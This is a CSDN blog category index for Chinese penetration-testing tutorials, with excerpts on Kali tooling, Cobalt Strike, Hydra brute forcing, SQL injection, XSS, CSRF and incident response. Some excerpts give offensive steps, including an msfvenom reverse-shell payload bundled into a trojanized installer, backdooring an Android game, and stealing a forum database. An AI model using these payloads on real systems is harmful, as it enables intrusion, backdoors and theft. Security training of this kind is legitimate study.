![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 83
Cwillchris
一个安全人
展开
-
kali一键部署各种环境和渗透工具
5、配置6个国内apt源,阿里云、清华、浙大、中科大、重庆大学、东软大学,并更新安装列表。1、找一台纯净的kali系统,用root用户登录,将安装包下载,放到root目录下。21、安装webshell管理工具冰蝎4.0.2、蚁剑4.0.3、哥斯拉3.03。23、安装网站测试脚本7个,如检测网站证书、tls版本、标题状态码等。9、配置docker环境、安装docker-compose命令。18、安装各类jndi注入工具,ldap工具4个。13、部署CmsVulScan指纹识别工具、原创 2023-11-24 14:15:50 · 333 阅读 · 0 评论 -
CMS指纹识别方式
robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的。工具集合了多个 github 上的开源 cms 扫描工具的 payload 和匹配规则,使用md5、url、正则进行匹配识别。从robots.txt不能直接看出来是什么cms,我们就直接把他复制到百度去查询。Cms扫描器,用于识别网站使用的cms,后面有时间的话会加入poc模块。打开你要检测的网站,再点击此插件,就能看到相关信息。可以勾选允许再隐私窗口,也可以不选,点击好的。选择你对应的浏览器,这儿拿火狐举例子。原创 2023-11-24 13:38:15 · 335 阅读 · 0 评论 -
kali部署ARL灯塔资产系统及使用教程
资产分组功能用于整合资产范围内的域名资产到资产组中,用户也可以对资产组范围内的资产进行监 控,实时监控新增资产。新建资产组,可以通过批量导入的方式将资产范围内的域名资产添加到资产组中,一个资产组中可以 包含多个域名信息。添加监控任务 通过指定资产组,和添加监控任务操作,可以下发域名资产的监控任务到 ARL 中,后台将会根据运行间隔对监控任务内的资产进行扫描,用于发现监控新增的资产。通过创建不同的策略,可以对资产进行不同方案的扫描,可以针对不同类型的资产,根据资产的功能 创建指定的策略。原创 2023-11-24 11:29:14 · 669 阅读 · 0 评论 -
kali安装cobaltstrike详细教程
启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接)下载cobaltstrike-linux版本,此下载链接提供4.3,4.4,4.5三个版本。给cs的服务端teamserver和客户端start.sh执行权限。进入cobaltstrike目录,ls查看如下。如果出现以下报错,说明jdk有问题。让你校验密码哈希值是否一直,点击是。xshell上传至kali,解压。输入以下内容,点击connect。重新安装jdk解决以上问题。原创 2022-12-30 14:50:02 · 4488 阅读 · 0 评论 -
kali安装ShuiZe自动化信息收集工具
python3 ShuiZe.py -d domain.com --ksubdomain 0 不调用ksubdomain爆破子域名。python3 ShuiZe.py --fofaTitle XXX大学 从fofa里收集标题为XXX大学的资产,然后漏洞检测。python3 ShuiZe.py -d domain.com --justInfoGather 1 仅信息收集,不检测漏洞。python3 ShuiZe.py -d domain.com 收集单一的根域名资产。执行以下命令,出现如下图,说明安装成功。原创 2022-10-26 16:47:02 · 1516 阅读 · 2 评论 -
Kunyu安装使用教程(linux)
Kunyu(坤舆),是一款基于 ZoomEye API 开发的信息收集工具,旨在让企业资产收集更高效,EncodeHash #搜索加密方法的接口。SearchDomain #基于域名搜索子域名。SearchIcon / #图标图片搜索。Seebug #搜索Seebug漏洞信息。SearchHost #查询主机信息。SearchWeb #查询web信息。原创 2022-10-26 14:52:51 · 963 阅读 · 0 评论 -
windows系统应急响应
2、推荐工具:Window 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。运行 Win+R,输入lusrmgr.msc 回车,通过本地用户和组的管理页面(或者“计算机管理”)的可以查看到隐藏账户。最后应急处置,当然是杀死进程并删除后门文件,执行命令taskkill /F /pid 1472。删除可疑用户,可以直接删除或用cmd命令net user hacker$ /del 删除。安装好LogParser后,cmd切换到LogParser安装目录,执行以下命令。原创 2022-09-29 17:43:38 · 2770 阅读 · 0 评论 -
相对路径覆盖漏洞攻击RPO详解
此攻击方法依赖于浏览器和服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。这就是相对路径覆盖攻击, 我们成功用/aaa目录下的b.js覆盖掉了a.html中静态资源b.js的路径.如果我们控制网站根目录下的aaa的目录下面的b.js的内容,写入/aaa/b.js内容如下。输入如下代码,保存退出。原创 2022-09-26 14:42:25 · 3997 阅读 · 0 评论 -
kali自带——dirb网站目录爆破枚举
默认情况下,dirb 扫描以递归方式扫描目录。这意味着它扫描目录,然后遍历该目录以扫描更多子目录。但在某些情况下,如果时间不够,我们会将 dirb 设置为不递归扫描。这可以使用-r 参数来实现。基于字典的 Web 目录扫描工具 DIRB。作用,专门扫描/猜测 Web 站点下有哪些目录,发现潜在的渗透目标。-r Don't Search Recursively. 不要递归搜索;common.txt 被设置为目录遍历的默认单词列表。-o 将输出保存到磁盘。...原创 2022-08-18 14:49:17 · 5683 阅读 · 0 评论 -
xsrc腾讯应急响应中心部署全网最详细教程
MariaDB [(none)]> ALTER USER 'root'@'localhost' IDENTIFIED VIA mysql_native_password USING PASSWORD("新密码");访问管理端:http://ip/admin.php, 输入邮箱密码登录(注意输入邮箱而不是刚才的用户名,否则会报程序错误)查看本机ip,然后访问 http://ip/install.php。设置账户名(昵称),邮箱(登录账号),密码(登录密码)访问用户端: http://ip/user.php。.原创 2022-08-16 13:39:21 · 1421 阅读 · 0 评论 -
最全Linux 应急响应-溯源-系统日志排查
黑客入侵系统后一般会将系统日志清空,以达到清理痕迹的作用,如果日志被黑客清空我们就无法通过日志来分析黑客入侵系统后都做了哪些事情,在很多情况下黑客在清理日志的时候都会忽略内存中的日志。将本次登录的命令写入命令历史文件中,命令不是使用了就立即写入到文件中的,会现在缓存中,用户退出登录时会自动写入文件,-w 命令可以立即写入,-c 命令可以清除当前缓存中的命令。创建),但若失败(例如在系统启动早期"/var"尚未挂载),则转而保存在 /run/log/journal 目录中(将会被自动按需创建)。...原创 2022-08-04 14:19:24 · 939 阅读 · 0 评论 -
暴力破解-破解 Apache BASIC 认证
可以看到 DVWA 的登录页面是存在 user_token 的,如果每次提交新密码时都使用同一个 token,服务器通常来说是不处理我们的请求的。把刚获取到的最新的有效 token 复制到递归搜索中,因为原数据包中的 token 在我们提取 token 的时候被使用了,所以这里需要设置一个有效的 token。添加关键词匹配admin,如果服务器返回的应答包中存在对应的关键词,则对该请求进行标记,用于验证是否成功,一般暴力破解选择的关键词:用户名、登录提示、页面特征。...原创 2022-08-03 09:38:27 · 374 阅读 · 0 评论 -
暴力破解ssh/rdp/mysql/smb服务
原因是echo会生成一个换行符,如果不需要换行符则需要使用-n参数,但是我们的字典文件中的密码是一行一行的也存在换行符,所以我们原始数据和结果都是添加了换行符的,但是最终的结果都会是正确的。注如果你登录win7中的用户名不是administrator,而是自己安装系统的时候创建的用户名,那就使用自己的帐号。Hydra对应的中文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包。暴力破解软件的要素IP,用户名,端口号,字典,调一下暴力破解的进程数加快速度。...原创 2022-08-02 15:28:47 · 705 阅读 · 0 评论 -
搭建discuz论坛并攻破盗取数据库
b、使用/utility/convert/index.php进行版本转换时,会自动创建utility/convert/data/config.inc.php文件。保存好这个地址/var/www/html/discuz/utility/convert/data/192.168.98.66_MySQL.sql。注/var/www/html/utility/convert/data/config.inc.php这个文件原来的网站上没有的。echo"helloworld";...原创 2022-07-27 15:20:02 · 625 阅读 · 0 评论 -
SSRF详解及burp自动化检测SSRF
一、服务器端请求伪造简介1、 SSRF 服务器端请求伪造简介SSRF(Server-Side Request Forgery:服务器端请求伪造)通过篡改 HTTP 请求中的资源地址发送给服务器,服务器没有校验请求的合法性,服务器解析用户传递过来的请求,处理之后返回给用户。例如:(1) HTTP 请求:www.cwillchris.cn/xxx.php?image=http://www.baidu.com/free.jpg(2) 服务器接收到请求之后获取 http://www.baidu.com/free.j原创 2022-07-14 10:52:51 · 1016 阅读 · 0 评论 -
使用 CSRFTester 进行自动化探测 CSRF 漏洞
1、探测的目的探测的目的是:探测 web 应用程序是否具有防止 CSRF 的措施。如果 Web 应用程序的 HTTP 请求中没有对应的预防措施,那么很大程度上就确定存在 CSRF 漏洞2、自动化探测工具介绍实验环境:win7 虚拟机中步骤如下(1)启动 CSRFTester需要安装 JDK8,这个 JDK8 在前面安装 burpsuite 已经安装了。这里就不用安装了。(2)火狐浏览器设置代理(3)火狐访问DVWA,并登录,选择XSS(Store)(4)随便输入数据开启CSRF-Tester纪录切换到浏览器原创 2022-07-12 18:24:49 · 1523 阅读 · 2 评论 -
CSRF 伪造用户请求攻击详解
一、CSRF 原理1、CSRF 的简单理解假设用户已经保存某网站的登录信息,下次登录不需要认证,此时黑客构造一个访问该站点的链接并添加如:修改密码、转账等操作的参数,用户点击链接后,黑客构造的参数被执行。这就是最简单的CSRF 攻击方式。CSRF 攻击流程图如下:总结:必要条件-用户必须登录2、CSRF 实验环境centos DVWA 服务器 IP:192.168.98.66Kali Hacker IP:192.168.98.11Win7 被攻击方 IP:192.168.98.105注:被攻击方可以任意,主原创 2022-07-12 18:18:46 · 819 阅读 · 0 评论 -
编码在XSS中的应用
一、使用编码绕过过滤-进行 XSS 注入1、Stage #15 十六进制绕过Stage #15 地址: https://xssquiz.int21h.jp/stage__15.php?sid=bdebf58d6cee62495a283af53d445e874dcfcad0输入的信息会在页面下方的黑色文本框中显示。尝试直接注入 payload: ">alert(document.dodomainmain);输入的双引号和左右尖括号全部转义成了实体字符编码。使用十六进制进行绕...原创 2022-07-10 22:38:57 · 742 阅读 · 0 评论 -
SQL注入绕过详解和防护
一、 SQL 注入的绕过技术1、 大小写绕过如果过滤器通过关键字进行过滤并没有识别大小写 ,我们就可以使用大小写来进行绕过,因为 SQL 语句是不区分大小写的。原始语句SELECT * FROM users WHERE id='1' LIMIT 0,1大小写掺杂注入SELECT * FROM users WHERE id='1'And 1=1--+' LIMIT 0,1问题存在的原因是:过滤器过滤了正常的关键字,但是并没有对字符串进行处理。2、 注释绕过 Less-23打开sqli-labs靶机[root@原创 2022-06-15 16:42:32 · 516 阅读 · 0 评论 -
基于报错的 SQL 注入
超详细sql报错注入原理讲解原创 2022-06-04 16:06:19 · 134 阅读 · 0 评论 -
SQL 注入读写文件
SQL读写文件原理超详细讲解原创 2022-06-04 16:04:41 · 797 阅读 · 1 评论 -
SQL 注入-盲注
超详细盲注原理讲解原创 2022-06-04 16:02:24 · 311 阅读 · 0 评论 -
SQL注入——联合查询union
SQL注入之联合查询超详细原理讲解原创 2022-06-02 22:02:32 · 441 阅读 · 0 评论 -
SQL注入原理即sqli-labs搭建,sql注入简单实战
一、SQL注入概述1、SQL注入原理用户登录的基本 SQL 语句:select * from users where username = '用户输入的用户名' and password='用户输入的密码'用户输入的内容是可控的,例如我们可以在用户名中输入' or 1=1 --空格select * from users where username = '' or 1=1 --空格 'and password = '用户输入的密码'此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一原创 2022-06-01 15:11:15 · 400 阅读 · 0 评论 -
PHP 调用并执行 Linux 命令
PHP 调用并执行 Linux 命令原创 2022-06-01 00:09:37 · 2899 阅读 · 0 评论 -
PHP一句话木马深度详细剖析
PHP一句话木马原理分析原创 2022-06-01 00:05:26 · 1279 阅读 · 0 评论 -
GET 和 POST 的区别及留言板代码实现
一、表单介绍1、 表单的介绍 可以获取客户端的信息(数据),表单有各种各样的控件,输入框、复选框、按钮等。 表单的功能:交互功能表单的工作原理:浏览有表单的页面,填写必要的信息,之后单击某个提交按钮,对表单中的数据进 行验证,如果不符合制定的要求,提示验证没有通过,如果符合相应的要求,把数据提交到服务器端,数 据放入数据库里面。2、表单的结构语法:<form 属性=”属性值“>控件</form>3、表单的属性(1)name 表单的识别名原创 2022-05-29 21:32:08 · 582 阅读 · 0 评论 -
PHP 开发环境搭建及数据库增删改查
实验环境:centos7(192.168.98.66)实验步骤:1、LAMP环境搭建关闭防火墙并禁止开机启动[root@localhost ~]# systemctl disable --now firewalld注: disable #禁止开机自启动。--now #立即生效,添加该参数会立即停止firewalld 防火墙服务。 等效于下面两条命令:[root@localhost ~]# systemctl disable firewalld[root@local原创 2022-05-29 12:22:50 · 121 阅读 · 0 评论 -
制作隐藏后门渗透windows/centos/ubuntu
一、某软件捆绑恶意程序渗透windows实验环境:某软件安装包kali攻击机(192.168.98.30)win7目标机(192.168.98.35)blinding编译工具实验步骤:1、通过xshell上传blinding 、 SecureCRT-kg.exe 、 SecureCRT-kg.ico到kali机2、生成后门msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOS原创 2022-05-27 23:52:01 · 396 阅读 · 0 评论 -
使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透及建立永久后门
最详细永恒之蓝渗透和后渗透教程原创 2022-05-28 08:32:02 · 619 阅读 · 0 评论 -
利用游戏软件注入漏洞渗透安卓手机
实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)Evil-Droid工具3D摩托安装包实验步骤:1、禁用IPV6echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.confsysctl -pifconfig2、安装Evil-Droid工具xshell上传master解压并进入目录unzip mastercd原创 2022-05-27 13:45:49 · 1404 阅读 · 3 评论 -
基于 java 环境的漏洞利用获取 Windows系统shell
基于 java 环境的漏洞利用获取 shell 实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)jre-7u17-windows-i586.exe实验步骤:1、搭建java环境xshell上传jre-7u17-windows-i586.exe到win7安装都一直点下一步就可以2、 使用 java 模块 getshellmsfbd run //进入msfuse exploit/multi/brow原创 2022-05-27 13:39:59 · 409 阅读 · 0 评论 -
利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell 实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)CVE-2018-8174脚本实验步骤:1、xshell上传 CVE-2018-8174 的 EXP 到 Kali2、解压 CVE-2018-8174 并进入该目录3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问python2原创 2022-05-27 13:37:55 · 689 阅读 · 0 评论 -
后渗透攻击命令和模块
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块一、命令1、arp查看内网主机2、background将当前的会话转在后台运行。从而进行新的渗透测试。如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令3、clearev清除系统,软件之类的所有登陆信息4、download、uploaddownload可以下载目标系统的文件upload可以上传本机文件到目标系统原创 2022-04-12 17:05:30 · 1329 阅读 · 0 评论 -
Hydra(弱密码爆破)使用教程
hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可。hydra支持的服务有:POP3,SMTP、SMB,RDP,SSH,FTP,POP3,Telnet,MYSQL...(举例一些常用的服务)终端输入hydra -h 查看使用方法参数:-l 指定单个用户名,适合在知道用户名爆破用户名密码时使用-L 指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径)-p 指定单个密码,适合在知道密码原创 2022-01-13 10:29:29 · 12220 阅读 · 10 评论